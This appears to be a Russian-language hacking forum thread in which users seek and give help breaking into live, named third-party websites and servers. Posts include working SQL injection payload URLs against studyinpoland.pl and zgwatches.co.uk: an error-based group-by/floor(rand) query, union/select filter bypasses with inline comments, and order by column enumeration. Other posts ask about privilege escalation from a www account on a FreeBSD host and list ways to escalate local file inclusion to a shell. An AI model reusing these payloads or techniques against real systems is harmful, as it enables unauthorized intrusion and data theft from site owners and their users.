Сижу на сервере под юзером WWW www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin Подскажите пожалуйста можна ли как-то повысить права или что интересного можна сделать на сервере? Спасибо.
FreeBSD dh01.hostmedia.net 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Mon Feb 2 17:54:17 EET 2009 [email protected]:/usr/src/sys/amd64/compile/iServer amd64
Расскажите про уязвимость HTTP Verb Tampering , читал мануалы. Так понял, это из GET запроса в livehttp ( мазила ) менять на POST запрос и все? Но что то не получается...
Кто поможет крутануть это дело с подзапросом (без error based) http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68
http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+ идем в раздел статей и курим до утра
Насколько я понял, уязвимость заключается в неправильной настройке доступа к данным. Например ты хочешь прочитать .htaccess, но тебе вылетает 403. Предположим, что в этом случае передается в запросе параметр name с логином юзера, и если он равен 'admin', то доступ разрешен, если нет то 403. Так вот изменив в таком запросе свой логин на 'admin', ты получишь доступ файлу.
http://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=-1%20/*!union*/%20/*!all*/%20*!select*/%20111111111,22222222,33333,bbbbbbbbb-- как обойти филтрацию? фильтруется все, кроме A-z и пробела. Даже запятые в примере выше
Ну я бы не сказал что "прям уж почти всё фильтруется". Это высказывание ложно. Для начала - инъекция с участием order by проходит на Ура. Code: _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+8+--+ TRUE _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+order+by+9+--+ FALSE group by как альтернативу order by кстати тоже пропускает. Code: _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+8+--+ _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+group+by+9+--+ Вопрос - Как ты подбирал столбцы ? Почему их у тебя 4 ? Далее - фильтруется не union и не select - фильтруется связка union+select . Обошёл так. Стандартно так-то. Code: _ttp://www.zgwatches.co.uk/customer_testimonials.php?CategoryID=438032182&testimonial_id=16-1+union+/*!select*/+1 Приеду домой - попробую обойти фильтр запятых через join - хотя можешь и сам попробовать.
CoBecTb для начало просто изучи английский тут же все и так понятно по логике, и все показано и какие тулзы понадобятся.
Я всё понимаю, и на каких то форумах аналогично могу ответить как и ты, но в данный момент мне хотелось бы прочитать ответ на мой вопрос. Переводил, ничего не понял, да признаю что нету у меня образования в этой области. Поэтому прошу помощи. Заранее благодарю.
BigBear, там фильтрация ( и ) есть. как ее обходить - хз. про ордер бай я знаю, просто для примера 4 сделал
Ага, уже посмотрел. + фильтруются любые математические сравнения типа < = >. Есть надежда, может они Post запрос не так жёстко фильтровать будут. Надо проверить. А в GET запросах нам точно тут ничего не светит.
Какие еще есть идеи с раскруткой lfi хотя бы до мини-шелла, если phpinfo нет, environ показывает ошибку и denied? Полный путь известен, в конфиг-файлах явок и паролей нет
Так если навскидку: искать логи и попытатся их проинклудить попытатся залить что то и проинклудить, может там форум есть и можно аватару со своим кодом запилить и т.д. попробовать через протокол data попробовать проинклудить отправленный на email письмо, если на сервере конечно что то такое крутиться попробывать залить какой либо файл через соседей и проинклудить
В скрипте поиска кавычка выдает ошибку: WHERE (name_ru LIKE '%'%' OR product_code LIKE '%'%') AND... Как тут выполнить order by?